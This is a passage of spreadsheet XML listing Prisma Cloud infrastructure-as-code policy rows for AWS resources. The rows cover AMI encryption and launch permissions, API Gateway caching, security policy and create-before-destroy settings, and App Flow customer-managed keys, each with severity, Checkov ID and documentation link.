        <is>
          <t>{"category":"General","resourceTypes":["aws_ami_copy"]}</t>
        </is>
      </c>
      <c r="AA687" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB687" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC687" t="inlineStr">
        <is>
          <t>CKV_AWS_236</t>
        </is>
      </c>
      <c r="AD687" t="b">
        <v>1</v>
      </c>
      <c r="AE687" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF687" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>b372b0f1-471d-4c05-97c6-aa130e1fe314</t>
        </is>
      </c>
      <c r="AI687" t="inlineStr"/>
      <c r="AJ687" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK687" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" t="inlineStr"/>
      <c r="B688" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C688" s="2" t="inlineStr"/>
      <c r="D688" t="inlineStr"/>
      <c r="E688" t="inlineStr"/>
      <c r="F688" t="inlineStr"/>
      <c r="G688" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J688" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami</t>
        </is>
      </c>
      <c r="K688" t="inlineStr">
        <is>
          <t>AWS copied AMIs are not encrypted</t>
        </is>
      </c>
      <c r="L688" t="inlineStr"/>
      <c r="M688" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N688" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O688" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P688" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q688" t="inlineStr"/>
      <c r="R688" t="inlineStr"/>
      <c r="S688" t="inlineStr"/>
      <c r="T688" t="b">
        <v>0</v>
      </c>
      <c r="U688" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V688" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami-copy</t>
        </is>
      </c>
      <c r="W688" t="inlineStr">
        <is>
          <t>Ensure that copied AMIs are encrypted</t>
        </is>
      </c>
      <c r="X688" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-copied-amis-are-encrypted</t>
        </is>
      </c>
      <c r="Y688" t="inlineStr"/>
      <c r="Z688" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ami_copy"]}</t>
        </is>
      </c>
      <c r="AA688" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB688" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC688" t="inlineStr">
        <is>
          <t>CKV_AWS_235</t>
        </is>
      </c>
      <c r="AD688" t="b">
        <v>1</v>
      </c>
      <c r="AE688" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF688" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>870d791a-5a4f-41ff-af39-6df4094efdd5</t>
        </is>
      </c>
      <c r="AI688" t="inlineStr"/>
      <c r="AJ688" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK688" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" t="inlineStr"/>
      <c r="B689" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C689" s="2" t="inlineStr"/>
      <c r="D689" t="inlineStr"/>
      <c r="E689" t="inlineStr"/>
      <c r="F689" t="inlineStr"/>
      <c r="G689" t="b">
        <v>1</v>
      </c>
      <c r="H6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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J689" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami</t>
        </is>
      </c>
      <c r="K689" t="inlineStr">
        <is>
          <t>AWS AMI launch permissions are not limited</t>
        </is>
      </c>
      <c r="L689" t="inlineStr"/>
      <c r="M689" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N689" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O689" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P689" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q689" t="inlineStr"/>
      <c r="R689" t="inlineStr"/>
      <c r="S689" t="inlineStr"/>
      <c r="T689" t="b">
        <v>0</v>
      </c>
      <c r="U689" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V689" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami-launch-permission</t>
        </is>
      </c>
      <c r="W689" t="inlineStr">
        <is>
          <t>Ensure to Limit AMI launch Permissions</t>
        </is>
      </c>
      <c r="X689" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-launch-permissions-are-limited</t>
        </is>
      </c>
      <c r="Y689" t="inlineStr"/>
      <c r="Z689" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ami_launch_permission"]}</t>
        </is>
      </c>
      <c r="AA689" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB689" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC689" t="inlineStr">
        <is>
          <t>CKV_AWS_205</t>
        </is>
      </c>
      <c r="AD689" t="b">
        <v>1</v>
      </c>
      <c r="AE689" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF689" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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89" t="inlineStr">
        <is>
          <t>10e7ef20-2277-41c2-be01-fdf747e2573b</t>
        </is>
      </c>
      <c r="AI689" t="inlineStr"/>
      <c r="AJ689" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK689" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" t="inlineStr"/>
      <c r="B690" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C690" s="2" t="inlineStr"/>
      <c r="D690" t="inlineStr"/>
      <c r="E690" t="inlineStr"/>
      <c r="F690" t="inlineStr"/>
      <c r="G690" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J690" t="inlineStr">
        <is>
          <t>IaC:General:aws-api</t>
        </is>
      </c>
      <c r="K690" t="inlineStr">
        <is>
          <t>AWS API deployments do not enable Create before Destroy</t>
        </is>
      </c>
      <c r="L690" t="inlineStr"/>
      <c r="M690" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N690" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O690" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P690" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q690" t="inlineStr"/>
      <c r="R690" t="inlineStr"/>
      <c r="S690" t="inlineStr"/>
      <c r="T690" t="b">
        <v>0</v>
      </c>
      <c r="U690" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V690" t="inlineStr">
        <is>
          <t>IaC:General:aws-api-gateway-deployment</t>
        </is>
      </c>
      <c r="W690" t="inlineStr">
        <is>
          <t>Ensure Create before destroy for API deployments</t>
        </is>
      </c>
      <c r="X690" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-deployments-enable-create-before-destroy</t>
        </is>
      </c>
      <c r="Y690" t="inlineStr"/>
      <c r="Z690" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_api_gateway_deployment"]}</t>
        </is>
      </c>
      <c r="AA690" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB690" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC690" t="inlineStr">
        <is>
          <t>CKV_AWS_217</t>
        </is>
      </c>
      <c r="AD690" t="b">
        <v>1</v>
      </c>
      <c r="AE690" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF690" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>9a8c2e43-cc8d-4113-ac3b-992a66780183</t>
        </is>
      </c>
      <c r="AI690" t="inlineStr"/>
      <c r="AJ690" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK690" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" t="inlineStr"/>
      <c r="B691" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C691" s="2" t="inlineStr"/>
      <c r="D691" t="inlineStr"/>
      <c r="E691" t="inlineStr"/>
      <c r="F691" t="inlineStr"/>
      <c r="G691" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J691" t="inlineStr">
        <is>
          <t>IaC:General:aws-api</t>
        </is>
      </c>
      <c r="K691" t="inlineStr">
        <is>
          <t>AWS API Gateway Domain does not use a modern security policy</t>
        </is>
      </c>
      <c r="L691" t="inlineStr"/>
      <c r="M691" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N691" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O691" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P691" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q691" t="inlineStr"/>
      <c r="R691" t="inlineStr"/>
      <c r="S691" t="inlineStr"/>
      <c r="T691" t="b">
        <v>0</v>
      </c>
      <c r="U691" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V691" t="inlineStr">
        <is>
          <t>IaC:General:aws-api-gateway-domain-name</t>
        </is>
      </c>
      <c r="W691" t="inlineStr">
        <is>
          <t>Ensure API Gateway Domain uses a modern security Policy</t>
        </is>
      </c>
      <c r="X691" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-domain-uses-a-modern-security-policy</t>
        </is>
      </c>
      <c r="Y691" t="inlineStr"/>
      <c r="Z691" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_api_gateway_domain_name"]}</t>
        </is>
      </c>
      <c r="AA691" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB691" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC691" t="inlineStr">
        <is>
          <t>CKV_AWS_206</t>
        </is>
      </c>
      <c r="AD691" t="b">
        <v>1</v>
      </c>
      <c r="AE691" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF691" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>6a4bbef8-cb7f-43a6-8053-bc1d49994d08</t>
        </is>
      </c>
      <c r="AI691" t="inlineStr"/>
      <c r="AJ691" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK691" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" t="inlineStr"/>
      <c r="B692" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C692" s="2" t="inlineStr"/>
      <c r="D692" t="inlineStr"/>
      <c r="E692" t="inlineStr"/>
      <c r="F692" t="inlineStr"/>
      <c r="G692" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J692" t="inlineStr">
        <is>
          <t>IaC:General:aws-api</t>
        </is>
      </c>
      <c r="K692" t="inlineStr">
        <is>
          <t>AWS API Gateway method settings do not enable caching</t>
        </is>
      </c>
      <c r="L692" t="inlineStr"/>
      <c r="M692" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N692" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O692" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P692" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q692" t="inlineStr"/>
      <c r="R692" t="inlineStr"/>
      <c r="S692" t="inlineStr"/>
      <c r="T692" t="b">
        <v>0</v>
      </c>
      <c r="U692" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V692" t="inlineStr">
        <is>
          <t>IaC:General:aws-api-gateway-method-settings</t>
        </is>
      </c>
      <c r="W692" t="inlineStr">
        <is>
          <t>Ensure API Gateway method setting caching is enabled</t>
        </is>
      </c>
      <c r="X692" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-method-settings-enable-caching</t>
        </is>
      </c>
      <c r="Y692" t="inlineStr"/>
      <c r="Z692" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_api_gateway_method_settings"]}</t>
        </is>
      </c>
      <c r="AA692" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB692" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC692" t="inlineStr">
        <is>
          <t>CKV_AWS_225</t>
        </is>
      </c>
      <c r="AD692" t="b">
        <v>1</v>
      </c>
      <c r="AE692" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF692" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>b89db1fa-40b5-4a4e-8415-18e5caab65aa</t>
        </is>
      </c>
      <c r="AI692" t="inlineStr"/>
      <c r="AJ692" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK692" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" t="inlineStr"/>
      <c r="B693" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C693" s="2" t="inlineStr"/>
      <c r="D693" t="inlineStr"/>
      <c r="E693" t="inlineStr"/>
      <c r="F693" t="inlineStr"/>
      <c r="G693" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J693" t="inlineStr">
        <is>
          <t>IaC:General:aws-api</t>
        </is>
      </c>
      <c r="K693" t="inlineStr">
        <is>
          <t>API Gateway method setting is not set to encrypted caching</t>
        </is>
      </c>
      <c r="L693" t="inlineStr"/>
      <c r="M693" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N693" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O693" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P693" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q693" t="inlineStr"/>
      <c r="R693" t="inlineStr"/>
      <c r="S693" t="inlineStr"/>
      <c r="T693" t="b">
        <v>0</v>
      </c>
      <c r="U693" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V693" t="inlineStr">
        <is>
          <t>IaC:General:aws-api-gateway-method-settings</t>
        </is>
      </c>
      <c r="W693" t="inlineStr">
        <is>
          <t>Ensure API Gateway method setting caching is set to encrypted</t>
        </is>
      </c>
      <c r="X693" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-308</t>
        </is>
      </c>
      <c r="Y693" t="inlineStr"/>
      <c r="Z693" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_api_gateway_method_settings"]}</t>
        </is>
      </c>
      <c r="AA693" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB693" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC693" t="inlineStr">
        <is>
          <t>CKV_AWS_308</t>
        </is>
      </c>
      <c r="AD693" t="b">
        <v>1</v>
      </c>
      <c r="AE693" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF693" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>8a749f51-86d9-4d8a-9003-9680a5ed4c12</t>
        </is>
      </c>
      <c r="AI693" t="inlineStr"/>
      <c r="AJ693" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK693" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" t="inlineStr"/>
      <c r="B694" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C694" s="2" t="inlineStr"/>
      <c r="D694" t="inlineStr"/>
      <c r="E694" t="inlineStr"/>
      <c r="F694" t="inlineStr"/>
      <c r="G694" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J694" t="inlineStr">
        <is>
          <t>IaC:General:aws-api</t>
        </is>
      </c>
      <c r="K694" t="inlineStr">
        <is>
          <t>Ensure AWS API gateway enables Create before Destroy</t>
        </is>
      </c>
      <c r="L694" t="inlineStr"/>
      <c r="M694" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N694" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O694" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P694" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q694" t="inlineStr"/>
      <c r="R694" t="inlineStr"/>
      <c r="S694" t="inlineStr"/>
      <c r="T694" t="b">
        <v>0</v>
      </c>
      <c r="U694" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V694" t="inlineStr">
        <is>
          <t>IaC:General:aws-api-gateway-rest-api</t>
        </is>
      </c>
      <c r="W694" t="inlineStr">
        <is>
          <t>Ensure Create before destroy for API GATEWAY</t>
        </is>
      </c>
      <c r="X694" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-enables-create-before-destroy</t>
        </is>
      </c>
      <c r="Y694" t="inlineStr"/>
      <c r="Z694" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_api_gateway_rest_api"]}</t>
        </is>
      </c>
      <c r="AA694" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB694" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC694" t="inlineStr">
        <is>
          <t>CKV_AWS_237</t>
        </is>
      </c>
      <c r="AD694" t="b">
        <v>1</v>
      </c>
      <c r="AE694" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF694" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>d9b217ab-ce34-46f7-9879-d9679342ac10</t>
        </is>
      </c>
      <c r="AI694" t="inlineStr"/>
      <c r="AJ694" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK694" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" t="inlineStr"/>
      <c r="B695" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C695" s="2" t="inlineStr"/>
      <c r="D695" t="inlineStr"/>
      <c r="E695" t="inlineStr"/>
      <c r="F695" t="inlineStr"/>
      <c r="G695" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J695" t="inlineStr">
        <is>
          <t>IaC:General:aws-api</t>
        </is>
      </c>
      <c r="K695" t="inlineStr">
        <is>
          <t>AWS API Gateway caching is disabled</t>
        </is>
      </c>
      <c r="L695" t="inlineStr"/>
      <c r="M695" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N695" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O695" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P695" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q695" t="inlineStr"/>
      <c r="R695" t="inlineStr"/>
      <c r="S695" t="inlineStr"/>
      <c r="T695" t="b">
        <v>0</v>
      </c>
      <c r="U695" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V695" t="inlineStr">
        <is>
          <t>IaC:General:aws-api-gateway-stage,AWS::Serverless::Api,AWS::ApiGateway::Stage</t>
        </is>
      </c>
      <c r="W695" t="inlineStr">
        <is>
          <t>Ensure API Gateway caching is enabled</t>
        </is>
      </c>
      <c r="X695" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-api-gateway-caching-is-enabled</t>
        </is>
      </c>
      <c r="Y695" t="inlineStr"/>
      <c r="Z695" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_api_gateway_stage", "AWS::Serverless::Api", "AWS::ApiGateway::Stage"]}</t>
        </is>
      </c>
      <c r="AA695" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB695" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC695" t="inlineStr">
        <is>
          <t>CKV_AWS_120</t>
        </is>
      </c>
      <c r="AD695" t="b">
        <v>1</v>
      </c>
      <c r="AE695" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF695" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>09e59cb9-5aaf-489a-a20a-9b6a4246c0ca</t>
        </is>
      </c>
      <c r="AI695" t="inlineStr"/>
      <c r="AJ695" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK695" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" t="inlineStr"/>
      <c r="B696" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C696" s="2" t="inlineStr"/>
      <c r="D696" t="inlineStr"/>
      <c r="E696" t="inlineStr"/>
      <c r="F696" t="inlineStr"/>
      <c r="G696" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J696" t="inlineStr">
        <is>
          <t>IaC:General:aws-appflow</t>
        </is>
      </c>
      <c r="K696" t="inlineStr">
        <is>
          <t>AWS App Flow connector profile does not use Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L696" t="inlineStr"/>
      <c r="M696" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N696" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O696" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P696" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q696" t="inlineStr"/>
      <c r="R696" t="inlineStr"/>
      <c r="S696" t="inlineStr"/>
      <c r="T696" t="b">
        <v>0</v>
      </c>
      <c r="U696" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V696" t="inlineStr">
        <is>
          <t>IaC:General:aws-appflow-connector-profile</t>
        </is>
      </c>
      <c r="W696" t="inlineStr">
        <is>
          <t>Ensure App Flow connector profile uses CMK</t>
        </is>
      </c>
      <c r="X696" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks</t>
        </is>
      </c>
      <c r="Y696" t="inlineStr"/>
      <c r="Z696" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_appflow_connector_profile"]}</t>
        </is>
      </c>
      <c r="AA696" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB696" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC696" t="inlineStr">
        <is>
          <t>CKV_AWS_264</t>
        </is>
      </c>
      <c r="AD696" t="b">
        <v>1</v>
      </c>
      <c r="AE696" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF696" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>530fa569-135d-4867-a837-722aec3cf138</t>
        </is>
      </c>
      <c r="AI696" t="inlineStr"/>
      <c r="AJ696" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK696" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" t="inlineStr"/>
      <c r="B697" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C697" s="2" t="inlineStr"/>
      <c r="D697" t="inlineStr"/>
      <c r="E697" t="inlineStr"/>
      <c r="F697" t="inlineStr"/>
      <c r="G697" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J697" t="inlineStr">
        <is>
          <t>IaC:General:aws-appflow</t>
        </is>
      </c>
      <c r="K697" t="inlineStr">
        <is>
          <t>AWS App Flow flow does not use Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L697" t="inlineStr"/>
      <c r="M697" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N697" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O697" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P697" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q697" t="inlineStr"/>
      <c r="R697" t="inlineStr"/>
      <c r="S697" t="inlineStr"/>
      <c r="T697" t="b">
        <v>0</v>
      </c>
      <c r="U697" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V697" t="inlineStr">
        <is>
          <t>IaC:General:aws-appflow-flow</t>
        </is>
      </c>
      <c r="W697" t="inlineStr">
        <is>
          <t>Ensure App Flow flow uses CMK</t>
        </is>
      </c>
      <c r="X697" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks</t>
        </is>
      </c>
      <c r="Y697" t="inlineStr"/>
      <c r="Z697" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_appflow_flow"]}</t>
        </is>
      </c>
      <c r="AA697" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB697" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC697" t="inlineStr">
        <is>
          <t>CKV_AWS_263</t>
        </is>
      </c>
      <c r="AD697" t="b">
        <v>1</v>
      </c>
      <c r="AE697" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF697" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>7591727d-5d6f-4387-bbad-3adc9fc12f7d</t>
        </is>
      </c>
      <c r="AI697" t="inlineStr"/>
      <c r="AJ697" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK697" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="698">
